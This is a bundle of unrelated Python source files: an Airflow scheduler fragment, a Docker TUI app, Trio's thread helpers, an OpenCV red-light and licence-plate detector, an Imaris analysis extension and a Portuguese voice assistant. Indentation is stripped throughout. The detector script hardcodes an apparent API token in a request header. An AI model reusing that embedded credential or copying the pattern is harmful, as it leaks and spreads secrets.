task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# If the task is dummy, then mark it as done automatically
if isinstance(ti.task, DummyOperator) \
and not ti.task.on_success_callback:
ti.state = State.SUCCESS
ti.start_date = ti.end_date = timezone.utcnow()
ti.duration = 0
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
init.py
|
"""
Application specific code.
"""
import logging
import threading
from sen.exceptions import NotifyError
from sen.tui.commands.base import Commander, SameThreadPriority
from sen.tui.commands.display import DisplayListingCommand
from sen.tui.ui import get_app_in_loop
from sen.tui.constants import PALLETE
from sen.docker_backend import DockerBackend
logger = logging.getLogger(__name__)
class Application:
def __init__(self, yolo=False):
self.d = DockerBackend()
self.loop, self.ui = get_app_in_loop(PALLETE)
self.ui.yolo = yolo
self.ui.commander = Commander(self.ui, self.d)
self.rt_thread = threading.Thread(target=self.realtime_updates, daemon=True)
self.rt_thread.start()
def run(self):
self.ui.run_command(DisplayListingCommand.name, queue=SameThreadPriority())
self.loop.run()
def realtime_updates(self):
"""
fetch realtime events from docker and pass them to buffers
:return: None
"""
# TODO: make this available for every buffer
logger.info("starting receiving events from docker")
it = self.d.realtime_updates()
while True:
try:
event = next(it)
except NotifyError as ex:
self.ui.notify_message("error when receiving realtime events from docker: %s" % ex,
level="error")
return
# FIXME: we should pass events to all buffers
# ATM the buffers can't be rendered since they are not displayed
# and hence traceback like this: ListBoxError("Listbox contents too short! ...
logger.debug("pass event to current buffer %s", self.ui.current_buffer)
try:
self.ui.current_buffer.process_realtime_event(event)
except Exception as ex:
# swallow any exc
logger.error("error while processing runtime event: %r", ex)
|
_threads.py
|
import threading
import queue as stdlib_queue
from itertools import count
import attr
import outcome
import trio
from ._sync import CapacityLimiter
from ._core import enable_ki_protection, disable_ki_protection, RunVar, TrioToken
# Global due to Threading API, thread local storage for trio token
TOKEN_LOCAL = threading.local()
class BlockingTrioPortal:
def __init__(self, trio_token=None):
if trio_token is None:
trio_token = trio.hazmat.current_trio_token()
self._trio_token = trio_token
def run(self, afn, *args):
return from_thread_run(afn, *args, trio_token=self._trio_token)
def run_sync(self, fn, *args):
return from_thread_run_sync(fn, *args, trio_token=self._trio_token)
################################################################
# XX at some point it probably makes sense to implement some sort of thread
# pool? Or at least that's what everyone says.
#
# There are two arguments for thread pools:
# - speed (re-using threads instead of starting new ones)
# - throttling (if you have 1000 tasks, queue them up instead of spawning 1000
# threads and running out of memory)
#
# Regarding speed, it's not clear how much of an advantage this is. Some
# numbers on my Linux laptop:
#
# Spawning and then joining a thread:
#
# In [25]: %timeit t = threading.Thread(target=lambda: None); t.start(); t.join()
# 10000 loops, best of 3: 44 µs per loop
#
# Using a thread pool:
#
# In [26]: tpp = concurrent.futures.ThreadPoolExecutor()
# In [27]: %timeit tpp.submit(lambda: None).result()
# <warm up run elided>
# In [28]: %timeit tpp.submit(lambda: None).result()
# 10000 loops, best of 3: 40.8 µs per loop
#
# What's a fast getaddrinfo look like?
#
# # with hot DNS cache:
# In [23]: %timeit socket.getaddrinfo("google.com", "80")
# 10 loops, best of 3: 50.9 ms per loop
#
# In [29]: %timeit socket.getaddrinfo("127.0.0.1", "80")
# 100000 loops, best of 3: 9.73 µs per loop
#
#
# So... maybe we can beat concurrent.futures with a super-efficient thread
# pool or something, but there really is not a lot of headroom here.
#
# Of course other systems might be different... here's CPython 3.6 in a
# Virtualbox VM running Windows 10 on that same Linux laptop:
#
# In [13]: %timeit t = threading.Thread(target=lambda: None); t.start(); t.join()
# 10000 loops, best of 3: 127 µs per loop
#
# In [18]: %timeit tpp.submit(lambda: None).result()
# 10000 loops, best of 3: 31.9 µs per loop
#
# So on Windows there *might* be an advantage? You've gotta be doing a lot of
# connections, with very fast DNS indeed, for that 100 us to matter. But maybe
# someone is.
#
#
# Regarding throttling: this is very much a trade-off. On the one hand, you
# don't want to overwhelm the machine, obviously. On the other hand, queueing
# up work on a central thread-pool creates a central coordination point which
# can potentially create deadlocks and all kinds of fun things. This is very
# context dependent. For getaddrinfo, whatever, they'll make progress and
# complete (we hope), and you want to throttle them to some reasonable
# amount. For calling waitpid() (because just say no to SIGCHLD), then you
# really want one thread-per-waitpid(), because for all you know the user has
# written some ridiculous thing like:
#
# for p in processes:
# await spawn(p.wait)
# # Deadlock here if there are enough processes:
# await some_other_subprocess.wait()
# for p in processes:
# p.terminate()
#
# This goes doubly for the sort of wacky thread usage we see in curio.abide
# (though, I'm not sure if that's actually useful in practice in our context,
# run_in_trio_thread seems like it might be a nicer synchronization primitive
# for most uses than trying to make threading.Lock awaitable).
#
# See also this very relevant discussion:
#
# https://twistedmatrix.com/trac/ticket/5298
#
# "Interacting with the products at Rackspace which use Twisted, I've seen
# problems caused by thread-pool maximum sizes with some annoying
# regularity. The basic problem is this: if you have a hard limit on the
# number of threads, *it is not possible to write a correct program which may
# require starting a new thread to un-block a blocked pool thread*" - glyph
#
# For now, if we want to throttle getaddrinfo I think the simplest thing is
# for the socket code to have a semaphore for getaddrinfo calls.
#
# Regarding the memory overhead of threads, in theory one should be able to
# reduce this a *lot* for a thread that's just calling getaddrinfo or
# (especially) waitpid. Windows and pthreads both offer the ability to set
# thread stack size on a thread-by-thread basis. Unfortunately as of 3.6
# CPython doesn't expose this in a useful way (all you can do is set it
# globally for the whole process, so it's - ironically - not thread safe).
#
# (It's also unclear how much stack size actually matters; on a 64-bit Linux
# server with overcommit -- i.e., the most common configuration -- then AFAICT
# really the only real limit is on stack size actually *used*; how much you
# *allocate* should be pretty much irrelevant.)
_limiter_local = RunVar("limiter")
# I pulled this number out of the air; it isn't based on anything. Probably we
# should make some kind of measurements to pick a good value.
DEFAULT_LIMIT = 40
_thread_counter = count()
def current_default_thread_limiter():
"""Get the default `~trio.CapacityLimiter` used by
`trio.to_thread.run_sync`.
The most common reason to call this would be if you want to modify its
:attr:`~trio.CapacityLimiter.total_tokens` attribute.
"""
try:
limiter = _limiter_local.get()
except LookupError:
limiter = CapacityLimiter(DEFAULT_LIMIT)
_limiter_local.set(limiter)
return limiter
# Eventually we might build this into a full-fledged deadlock-detection
# system; see https://github.com/python-trio/trio/issues/182
# But for now we just need an object to stand in for the thread, so we can
# keep track of who's holding the CapacityLimiter's token.
@attr.s(frozen=True, eq=False, hash=False)
class ThreadPlaceholder:
name = attr.ib()
@enable_ki_protection
async def to_thread_run_sync(sync_fn, *args, cancellable=False, limiter=None):
"""Convert a blocking operation into an async operation using a thread.
These two lines are equivalent::
sync_fn(*args)
await trio.to_thread.run_sync(sync_fn, *args)
except that if ``sync_fn`` takes a long time, then the first line will
block the Trio loop while it runs, while the second line allows other Trio
tasks to continue working while ``sync_fn`` runs. This is accomplished by
pushing the call to ``sync_fn(*args)`` off into a worker thread.
From inside the worker thread, you can get back into Trio using the
functions in `trio.from_thread`.
Args:
sync_fn: An arbitrary synchronous callable.
*args: Positional arguments to pass to sync_fn. If you need keyword
arguments, use :func:`functools.partial`.
cancellable (bool): Whether to allow cancellation of this operation. See
discussion below.
limiter (None, or CapacityLimiter-like object):
An object used to limit the number of simultaneous threads. Most
commonly this will be a `~trio.CapacityLimiter`, but it could be
anything providing compatible
:meth:`~trio.CapacityLimiter.acquire_on_behalf_of` and
:meth:`~trio.CapacityLimiter.release_on_behalf_of` methods. This
function will call ``acquire_on_behalf_of`` before starting the
thread, and ``release_on_behalf_of`` after the thread has finished.
If None (the default), uses the default `~trio.CapacityLimiter`, as
returned by :func:`current_default_thread_limiter`.
**Cancellation handling**: Cancellation is a tricky issue here, because
neither Python nor the operating systems it runs on provide any general
mechanism for cancelling an arbitrary synchronous function running in a
thread. This function will always check for cancellation on entry, before
starting the thread. But once the thread is running, there are two ways it
can handle being cancelled:
* If ``cancellable=False``, the function ignores the cancellation and
keeps going, just like if we had called ``sync_fn`` synchronously. This
is the default behavior.
* If ``cancellable=True``, then this function immediately raises
`~trio.Cancelled`. In this case **the thread keeps running in
background** – we just abandon it to do whatever it's going to do, and
silently discard any return value or errors that it raises. Only use
this if you know that the operation is safe and side-effect free. (For
example: :func:`trio.socket.getaddrinfo` is uses a thread with
``cancellable=True``, because it doesn't really affect anything if a
stray hostname lookup keeps running in the background.)
The ``limiter`` is only released after the thread has *actually*
finished – which in the case of cancellation may be some time after this
function has returned. If :func:`trio.run` finishes before the thread
does, then the limiter release method will never be called at all.
.. warning::
You should not use this function to call long-running CPU-bound
functions! In addition to the usual GIL-related reasons why using
threads for CPU-bound work is not very effective in Python, there is an
additional problem: on CPython, `CPU-bound threads tend to "starve out"
IO-bound threads <https://bugs.python.org/issue7946>`__, so using
threads for CPU-bound work is likely to adversely affect the main
thread running Trio. If you need to do this, you're better off using a
worker process, or perhaps PyPy (which still has a GIL, but may do a
better job of fairly allocating CPU time between threads).
Returns:
Whatever ``sync_fn(*args)`` returns.
Raises:
Exception: Whatever ``sync_fn(*args)`` raises.
"""
await trio.hazmat.checkpoint_if_cancelled()
token = trio.hazmat.current_trio_token()
if limiter is None:
limiter = current_default_thread_limiter()
# Holds a reference to the task that's blocked in this function waiting
# for the result – or None if this function was cancelled and we should
# discard the result.
task_register = [trio.hazmat.current_task()]
name = "trio-worker-{}".format(next(_thread_counter))
placeholder = ThreadPlaceholder(name)
# This function gets scheduled into the Trio run loop to deliver the
# thread's result.
def report_back_in_trio_thread_fn(result):
def do_release_then_return_result():
# release_on_behalf_of is an arbitrary user-defined method, so it
# might raise an error. If it does, we want that error to
# replace the regular return value, and if the regular return was
# already an exception then we want them to chain.
try:
return result.unwrap()
finally:
limiter.release_on_behalf_of(placeholder)
result = outcome.capture(do_release_then_return_result)
if task_register[0] is not None:
trio.hazmat.reschedule(task_register[0], result)
# This is the function that runs in the worker thread to do the actual
# work and then schedule the call to report_back_in_trio_thread_fn
# Since this is spawned in a new thread, the trio token needs to be passed
# explicitly to it so it can inject it into thread local storage
def worker_thread_fn(trio_token):
TOKEN_LOCAL.token = trio_token
try:
result = outcome.capture(sync_fn, *args)
try:
token.run_sync_soon(report_back_in_trio_thread_fn, result)
except trio.RunFinishedError:
# The entire run finished, so our particular task is certainly
# long gone -- it must have cancelled.
pass
finally:
del TOKEN_LOCAL.token
await limiter.acquire_on_behalf_of(placeholder)
try:
# daemon=True because it might get left behind if we cancel, and in
# this case shouldn't block process exit.
current_trio_token = trio.hazmat.current_trio_token()
thread = threading.Thread(
target=worker_thread_fn,
args=(current_trio_token,),
name=name,
daemon=True
)
thread.start()
except:
limiter.release_on_behalf_of(placeholder)
raise
def abort(_):
if cancellable:
task_register[0] = None
return trio.hazmat.Abort.SUCCEEDED
else:
return trio.hazmat.Abort.FAILED
return await trio.hazmat.wait_task_rescheduled(abort)
def _run_fn_as_system_task(cb, fn, *args, trio_token=None):
"""Helper function for from_thread.run and from_thread.run_sync.
Since this internally uses TrioToken.run_sync_soon, all warnings about
raised exceptions canceling all tasks should be noted.
"""
if trio_token and not isinstance(trio_token, TrioToken):
raise RuntimeError("Passed kwarg trio_token is not of type TrioToken")
if not trio_token:
try:
trio_token = TOKEN_LOCAL.token
except AttributeError:
raise RuntimeError(
"this thread wasn't created by Trio, pass kwarg trio_token=..."
)
# TODO: This is only necessary for compatibility with BlockingTrioPortal.
# once that is deprecated, this check should no longer be necessary because
# thread local storage (or the absence of) is sufficient to check if trio
# is running in a thread or not.
try:
trio.hazmat.current_task()
except RuntimeError:
pass
else:
raise RuntimeError(
"this is a blocking function; call it from a thread"
)
q = stdlib_queue.Queue()
trio_token.run_sync_soon(cb, q, fn, args)
return q.get().unwrap()
def from_thread_run(afn, *args, trio_token=None):
"""Run the given async function in the parent Trio thread, blocking until it
is complete.
Returns:
Whatever ``afn(*args)`` returns.
Returns or raises whatever the given function returns or raises. It
can also raise exceptions of its own:
Raises:
RunFinishedError: if the corresponding call to :func:`trio.run` has
already completed.
Cancelled: if the corresponding call to :func:`trio.run` completes
while ``afn(*args)`` is running, then ``afn`` is likely to raise
:exc:`trio.Cancelled`, and this will propagate out into
RuntimeError: if you try calling this from inside the Trio thread,
which would otherwise cause a deadlock.
AttributeError: if no ``trio_token`` was provided, and we can't infer
one from context.
**Locating a Trio Token**: There are two ways to specify which
`trio.run` loop to reenter:
- Spawn this thread from `trio.to_thread.run_sync`. Trio will
automatically capture the relevant Trio token and use it when you
want to re-enter Trio.
- Pass a keyword argument, ``trio_token`` specifiying a specific
`trio.run` loop to re-enter. This is useful in case you have a
"foreign" thread, spawned using some other framework, and still want
to enter Trio.
"""
def callback(q, afn, args):
@disable_ki_protection
async def unprotected_afn():
return await afn(*args)
async def await_in_trio_thread_task():
q.put_nowait(await outcome.acapture(unprotected_afn))
trio.hazmat.spawn_system_task(await_in_trio_thread_task, name=afn)
return _run_fn_as_system_task(callback, afn, *args, trio_token=trio_token)
def from_thread_run_sync(fn, *args, trio_token=None):
"""Run the given sync function in the parent Trio thread, blocking until it
is complete.
Returns:
Whatever ``fn(*args)`` returns.
Returns or raises whatever the given function returns or raises. It
can also raise exceptions of its own:
Raises:
RunFinishedError: if the corresponding call to `trio.run` has
already completed.
Cancelled: if the corresponding call to `trio.run` completes
while ``afn(*args)`` is running, then ``afn`` is likely to raise
:exc:`trio.Cancelled`, and this will propagate out into
RuntimeError: if you try calling this from inside the Trio thread,
which would otherwise cause a deadlock.
AttributeError: if no ``trio_token`` was provided, and we can't infer
one from context.
**Locating a Trio Token**: There are two ways to specify which
`trio.run` loop to reenter:
- Spawn this thread from `trio.to_thread.run_sync`. Trio will
automatically capture the relevant Trio token and use it when you
want to re-enter Trio.
- Pass a keyword argument, ``trio_token`` specifiying a specific
`trio.run` loop to re-enter. This is useful in case you have a
"foreign" thread, spawned using some other framework, and still want
to enter Trio.
"""
def callback(q, fn, args):
@disable_ki_protection
def unprotected_fn():
return fn(*args)
res = outcome.capture(unprotected_fn)
q.put_nowait(res)
return _run_fn_as_system_task(callback, fn, *args, trio_token=trio_token)
|
detection.py
|
import cv2
import numpy as np
import matplotlib.path as mplPath
import time
from datetime import datetime
import os
import threading
import requests
# --------------------- GLOBAL --------------- #
poly_ne = np.array([[793,351],[920,466],[1102,420],[961,329]])
tl = (1106,100)
br = (1153,203)
cap = cv2.VideoCapture("test_video.mp4")
img_folder = "./image/"
# Plate Recognizer
regions = ['vn']
IS_FREE = True
ImageNode = []
#----------------------------------------------#
#---------------------- UTILS FUNCTION ---------------#
def pega_centro(x, y, w, h):
x1 = int(w / 2)
y1 = int(h / 2)
cx = x + x1
cy = y + y1
return cx,cy
def inside_poly(pnts, poly):
bbPath = mplPath.Path(poly)
return bbPath.contains_point(pnts)
def detect_plate(path):
with open(path, 'rb') as fp:
response = requests.post(
'https://api.platerecognizer.com/v1/plate-reader/',
data=dict(regions=regions), # Optional
files=dict(upload=fp),
headers={'Authorization': 'Token 11e12906b07074d87046cb0e3b530f55dd85a2c1'})
result = response.json()['results']
IS_FREE = True
print(result)
#------------------------------------------------------#
ret, frame1 = cap.read()
ret, frame2 = cap.read()
while cap.isOpened():
#Detect Red-light
if frame1 is None or frame2 is None:
break
hsv_Frame = cv2.cvtColor(frame1[tl[1]:br[1], tl[0]:br[0]], cv2.COLOR_BGR2HSV)
low_red = np.array([161, 155, 84], np.uint8)
high_red = np.array([179, 255, 255], np.uint8)
mask_red = cv2.inRange(hsv_Frame, low_red, high_red)
coord=cv2.findNonZero(mask_red)
#Detect moving
try:
diff = cv2.absdiff(frame1, frame2)
except:
print("error")
gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(gray, (5,5), 0)
_, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
dilated = cv2.dilate(thresh, None, iterations=3)
contours, _ = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if not(coord is None):
poly = cv2.polylines(frame1, [poly_ne] ,True, (0, 0, 255),3)
cv2.putText(frame1, "Status: {}".format('Den_do'), (10, 20), cv2.FONT_HERSHEY_SIMPLEX,
1, (0, 0, 255), 3)
for contour in contours:
(x, y, w, h) = cv2.boundingRect(contour)
if cv2.contourArea(contour) < 10000:
continue
centro = pega_centro(x, y, w, h)
x1, y1, w1, h1 = x, y, w, h
circle_o = cv2.circle(frame1, centro, 4, (0, 0, 255), -1)
rectangel = cv2.rectangle(frame1, (x, y), (x + w, y + h), (0, 255, 0), 2)
if inside_poly(centro, poly_ne):
cv2.imshow("crop", frame2[y1: y1 + h1, x1: x1 + w1])
path = "%s%s_%s\\" % (img_folder, datetime.today().strftime("%Y_%m_%d"),int(time.time()))
if not os.path.exists(path):
os.makedirs(path)
#cv2.imwrite(path + "overview.png", frame1)
cv2.imwrite(path + "detailed.png", frame2[y1: y1 + h1, x1: x1 + w1])
#detect_plate(path + "detailed.png")
ImageNode.append(path+"detailed.png")
else:
cv2.putText(frame1, "Status: {}".format('Den_xanh'), (10, 20), cv2.FONT_HERSHEY_SIMPLEX,
1, (0, 255, 0), 3)
print(ImageNode)
if IS_FREE and len(ImageNode) > 0:
IS_FREE = False
thread = threading.Thread(target=detect_plate, args=(ImageNode.pop(0),))
thread.start()
cv2.imshow("feed", frame1)
#cv2.imwrite("image.png", frame1)
frame1 = frame2
_, frame2 = cap.read()
if cv2.waitKey(33) & 0xFF == ord("q"):
break
cv2.destroyAllWindows()
cap.release()
|
xtscr.py
|
#
# Spinal Cord Recovery XTension
#
# Copyright (c) 2016 Keith Schulze (keith.schulze@monash.edu)
# MIT-style copyright and disclaimer apply
#
# <CustomTools>
# <Menu>
# <Item name="SCR" icon="Python" tooltip="Spinal Cord Recovery">
# <Command>PythonXT::xtscr(%i)</Command>
# </Item>
# </Menu>
# </CustomTools>
#
""" Imaris Xtension for the analysis of Spinal Cord Recovery in live
confocal images.
"""
import math
import os
import time
import threading
import tkinter as tk
from queue import Queue
from tkinter import ttk, filedialog, messagebox
import numpy as np
import pandas as pd
from pIceImarisConnector import pIceImarisConnector as ice
from scr import scr
class SCRGUI(object):
"""docstring for SCRGUI"""
def __init__(self, master, queue):
self.queue = queue
self.labeltext = tk.StringVar()
self.labeltext.set("SCR Processing")
label = tk.Label(master, width=50, textvariable=self.labeltext)
self.prog = ttk.Progressbar(master, orient='horizontal', length=300,
mode='determinate')
label.pack(padx=10, pady=10)
self.prog.pack(padx=10, pady=10)
def processincoming(self):
while self.queue.qsize():
try:
msg, prog = self.queue.get(0)
self.labeltext.set(msg)
self.prog.step(prog)
except Queue.Empty:
pass
class SCRProcessor(object):
"""docstring for SCRProcessor"""
def __init__(self, master, conn):
super(SCRProcessor, self).__init__()
self.master = master
self.conn = conn
self.queue = Queue()
self.gui = SCRGUI(master, self.queue)
self.running = True
self.dataset_name, _ = os.path.splitext(
os.path.basename(conn.mImarisApplication.GetCurrentFileName())
)
dir_options = {'mustexist': True,
'title': 'Please select an output directory'}
self.output_dir = filedialog.askdirectory(**dir_options)
if len(self.output_dir) == 0:
self.master.quit()
raise Exception("Open folder cancelled")
threading.Thread(target=self.workerthread).start()
self.periodiccall()
def periodiccall(self):
self.gui.processincoming()
if self.running:
self.master.after(10, self.periodiccall)
def extract_sc_centres(self, t):
"""Extract central axes for a specified time point.
Parameters
----------
t: int
timepoint
Returns
-------
axes: np.ndarray (float)
2 x 3 array storing coords for the start and end coords of
the central axis for the given timepoint.
"""
self.queue.put(("Extracting central axis for timepoint: " + str(t), 1))
vol = self.conn.getDataVolume(0, t)
return scr.extract_sc_centres(vol, 1, slices=50)
def workerthread(self):
if not os.path.exists(self.output_dir):
print("Folder path does not exist")
messagebox.showwarning(
"nonexistent folder",
"Folder does not exist!"
)
time.sleep(2)
self.master.quit()
raise Exception("Folder not found.")
self.queue.put(("Getting dataset dimensions", 1))
# Get dataset parameters
xsize, ysize, zsize, csize, tsize = self.conn.getSizes()
xvox, yvox, zvox = self.conn.getVoxelSizes()
xmin, _, ymin, _, zmin, _ = self.conn.getExtends()
# Determine central axis in each frame
central_axis_cache = os.path.join(self.output_dir,
self.dataset_name+".npy")
if os.path.exists(central_axis_cache):
self.queue.put(("Extracting central axis for each time point.", 90))
sc_centre_coords = np.load(central_axis_cache)
else:
sc_centre_coords = np.array(
[self.extract_sc_centres(t) for t in range(tsize)])
# Convert to physical coords using voxel sizes
sc_centre_coords[:,:,0] = sc_centre_coords[:,:,0] * xvox + xmin
sc_centre_coords[:,:,1] = sc_centre_coords[:,:,1] * yvox + ymin
sc_centre_coords[:,:,2] = sc_centre_coords[:,:,2] * zvox + zmin
np.save(central_axis_cache, sc_centre_coords)
# Get the lesion coords from the measurement points object
self.queue.put(("Retrieve lesion coordinates", 1))
mp = self.conn.getAllSurpassChildren(False, "MeasurementPoints")[0]
if not mp:
print("No measurement points marking lesion site specified")
messagebox.showerror("No lesion site",
"Please use measurement points to indicate"
" lesion site and centre of the notochord"
" perpendicular to lesion.")
self.master.quit()
return
lesion_coords = SCRProcessor.get_lesion_coordinates(mp)
# Get spot coords from the selected spots object
self.queue.put(("Retrieve spot coordinates", 1))
spots = None
try:
spots = self.conn.getSurpassSelection("Spots")
except Exception as err:
messagebox.showerror("No Spots object selected",
"No spots object found or selected.")
self.master.quit()
return
if not spots:
print("No spots were found. Please select spots object you want"
"to analyse.")
messagebox.showerror("No Spots",
"No spots object founds or not selected."
" Please select the spots object to want"
" analyse")
self.master.quit()
return
spot_coords = np.array(spots.GetPositionsXYZ(), dtype=np.float)
# Create a pandas dataframe to summarise data
self.queue.put(("Creating dataframe", 1))
spot_df = pd.DataFrame(spot_coords.view(dtype=[('x', np.float),
('y', np.float),
('z', np.float)]).ravel())
# Add tracks to the dataframe
spot_df["track"] = np.zeros(len(spot_df["x"]))
spot_track_edges = spots.GetTrackEdges()
spot_track_ids = spots.GetTrackIds()
for i, e in zip(spot_track_ids, spot_track_edges):
if spot_df.track[e[0]] == 0:
spot_df.track[e[0]] = i
if spot_df.track[e[1]] == 0:
spot_df.track[e[1]] = i
spot_df.track = spot_df.track.astype(np.int).astype(np.str)
spot_df['time'] = np.array(spots.GetIndicesT(), np.float) *\
self.conn.mImarisApplication.GetDataSet().GetTimePointsDelta()
# Add time index
spot_df['tindex'] = np.array(spots.GetIndicesT())
# Register to cylindrical coordinates
self.queue.put(("Registering on cylindrical coordinate system", 1))
spot_df[['r', 'l', 'theta']] = scr.register_cylinder(spot_df, sc_centre_coords,
lesion_coords)
spot_df['abs_r'] = np.abs(spot_df['r'])
spot_df['theta_deg'] = np.rad2deg(np.add(spot_df.theta, np.pi))
self.queue.put(("Saving dataframe", 1))
spot_df.to_csv(os.path.join(self.output_dir, self.dataset_name+".csv"))
self.running = False
self.master.quit()
@classmethod
def get_lesion_coordinates(cls, measurement_points):
""" Get Lesion coordinates from a measurement points object.
Parameters
----------
measurement_points: MeasurementPoints object
MeasurementPoints object from Imaris
Returns
-------
lesion_coords: numpy.ndarray
2 x 3 ndarray array representing coordinates for
lesion site and centre of the notochord perpendicular
to the lesion site.
"""
return np.array(measurement_points.GetPositionsXYZ(), np.float)
def xtscr(appid):
"""Entry function for the Imaris XTension."""
conn = ice(appid)
if not conn.isAlive():
print("Could not connect to Imaris")
messagebox.showwarning("Connection failed",
"Could not connect to Imaris!")
time.sleep(2)
return
root = tk.Tk()
client = SCRProcessor(root, conn)
root.mainloop()
|
ROXXANE4.py
|
from json import loads
from math import pow
from os import getlogin, listdir
from os.path import exists
from pickle import load, dump
from random import randint
from sys import exit
import threading
import webbrowser
from subprocess import check_output
from datetime import datetime, date
# from time import sleep
from tkinter import Tk, Button, PhotoImage, Label, Entry, Toplevel
# from tkinter import messagebox
import pandas as pd
from psutil import cpu_percent, virtual_memory
from pyaudio import PyAudio, paInt16
import pyautogui
from pyperclip import copy
from pyttsx3 import init
import qrcode
from requests import exceptions, get
import speech_recognition as sr
from wikipedia import set_lang, summary
from plyer import notification
# from tqdm import tqdm
from vosk import Model, KaldiRecognizer
from multiprocessing.pool import ThreadPool
import numpy as np
from pybrain import TanhLayer
from pybrain.tools.shortcuts import buildNetwork
from pybrain.supervised.trainers.backprop import BackpropTrainer
from pybrain.datasets.supervised import SupervisedDataSet
import win32com.client as win32
import re
engine = init()
model = Model("model")
rec = KaldiRecognizer(model, 16000)
p = PyAudio()
stream = p.open(format=paInt16, channels=1, rate=16000, input=True, frames_per_buffer=8000)
stream.start_stream()
despedidas = ['tchal', 'adeus', 'te vejo mais tarde', 'até', 'até logo']
class ROXXANE(threading.Thread):
def __init__(self):
threading.Thread.__init__(self) # thread da Roxxane
self.voz_data = ''
self.aux = ''
# falas
self.arquivoR = open(r"databaseR.txt", 'r', encoding='utf-8')
self.arquivoR = self.arquivoR.read()
self.arquivoR = self.arquivoR.split()
self.opcoes = []
for i in range(len(self.arquivoR)):
if i >= 5:
if self.arquivoR[i] == "-1":
break
self.opcoes.append(self.arquivoR[i])
self.pessoa = self.arquivoR[1]
self.nome_assistente = self.arquivoR[3]
self.arquivoF = open(r"databaseF.txt", 'r', encoding='utf-8')
self.arquivoF = self.arquivoF.read()
self.arquivoF = self.arquivoF.split()
self.pool = ThreadPool(processes=1)
# netWork
self.arquivoC = open(r'databaseC.txt', 'r', encoding='utf-8')
self.arquivoC = self.arquivoC.read()
self.arquivoC = self.arquivoC.split()
self.codigos = [[int(i)] for i in self.arquivoC if i.isnumeric()]
self.frases = [str(i).replace("_", " ") for i in self.arquivoC if not i.isnumeric()]
self.vocabulario = []
self.var = ""
self.is_run = True
def construir_vocabulario(self, sentences):
for sentence in sentences:
for palavra in sentence.split(" "):
if palavra not in self.vocabulario:
self.vocabulario.append(palavra)
def criar_array(self, sentences):
palavras = sentences.split(' ')
vetor = np.zeros(len(self.vocabulario))
for palavra in palavras:
for i, _palavra in enumerate(self.vocabulario):
if _palavra == palavra:
vetor[i] = 1
return list(vetor)
def criar_dataset(self):
self.construir_vocabulario(self.frases)
entradas = []
for sentence in self.frases:
vetor = self.criar_array(sentence)
passe = []
for num in vetor:
passe.append(num)
entradas.append(passe)
self.ds = SupervisedDataSet(self.get_len(), 1)
for i, j in zip(entradas, self.codigos):
self.ds.addSample(i, j)
def treinar_rede(self):
self.netWork = buildNetwork(self.get_len(), 5, 5, 1, bias=True, hiddenclass=TanhLayer)
back = BackpropTrainer(self.netWork, self.ds)
for i in range(2000):
back.train()
with open('rede_neural.xml', 'wb') as fa:
dump(self.netWork, fa, 0)
def retornar_valor_previsto(self, texto):
num = f"{float(self.netWork.activate(self.criar_array(texto))):,.0f}"
return float(num)
def get_len(self):
return len(self.vocabulario)
# daqui para cima é da redeneural
def existe(self, termos):
for termo in termos:
if termo in self.voz_data:
return True
@staticmethod
def pegar_comandos_separados():
while True:
rec.pause_threshold = 1
data = stream.read(10000)
if len(data) == 0:
break
if rec.AcceptWaveform(data):
resultado = rec.FinalResult()
resultado = loads(resultado)
if resultado is not None:
return resultado['text'].lower()
def conversas(self):
if self.existe(['hey', 'hi', 'hello', 'oi', 'holla']):
saudacoes = [f'Oi {self.pessoa}, o que você está fazendo hoje?',
f'Oi {self.pessoa}, como eu posso te ajudar?',
f'Oi {self.pessoa}, você precisa de algo?',
f'Oi {self.pessoa}, como vai você?']
resposta = saudacoes[randint(0, len(saudacoes) - 1)]
self.engine_fala(resposta)
self.voz_data = ' '
return
elif self.existe(['tudo bem', 'como você está', 'está tudo bem', 'está tude bem com você']):
frases = [f'eu estou bem, {self.pessoa}, obrigada',
f'estou bem, muito obrigada, {self.pessoa}',
f'eu estou bem {self.pessoa}, como vai você?']
fala = frases[randint(0, len(frases) - 1)]
self.engine_fala(fala)
self.voz_data = ' '
return
elif self.existe(['qual é seu nome', 'me dia seu nome', 'seu nome é', 'seu nome']):
self.engine_fala(f'Meu nome é {self.nome_assistente}')
return
elif self.existe(['como você está', 'está tudo bem com você', 'está feliz']):
falas = [f'eu estou bem {self.pessoa}, obrigada por se preocupar',
f'eu estou ótima, {self.pessoa}, obrigada'
f'eu estou muito feliz como estou hoje, {self.pessoa}']
fala = falas[randint(0, len(falas) - 1)]
self.engine_fala(fala)
self.voz_data = ' '
return
elif self.existe(['cu', 'caralho', 'porra', 'tá surda', 'cú']):
self.engine_fala('Olha a boca menino')
self.engine_fala('tenha modas')
self.voz_data = ' '
return
elif self.existe(despedidas):
self.fechar_assistente()
elif self.existe(['bom dia', 'boa tarde', 'boa noite']):
self.Boas_vindas()
self.voz_data = ' '
return
elif self.existe(['funcionando bem', 'como você tem estado', 'você tem estado', 'tem estado']):
self.engine_fala(f'Eu estou funcionando bem e sem problemas, {self.pessoa}, obrigada por perguntar')
self.engine_fala('como você está?')
while True:
voz = self.pegar_comandos_separados()
if 'bem' in voz:
self.engine_fala('Que bom, espero que continue assim!')
break
if 'mal' in voz or 'mau' in voz:
self.engine_fala('que pena, eu sei que logo logo vai passar')
break
self.voz_data = ' '
return
else:
self.respostas()
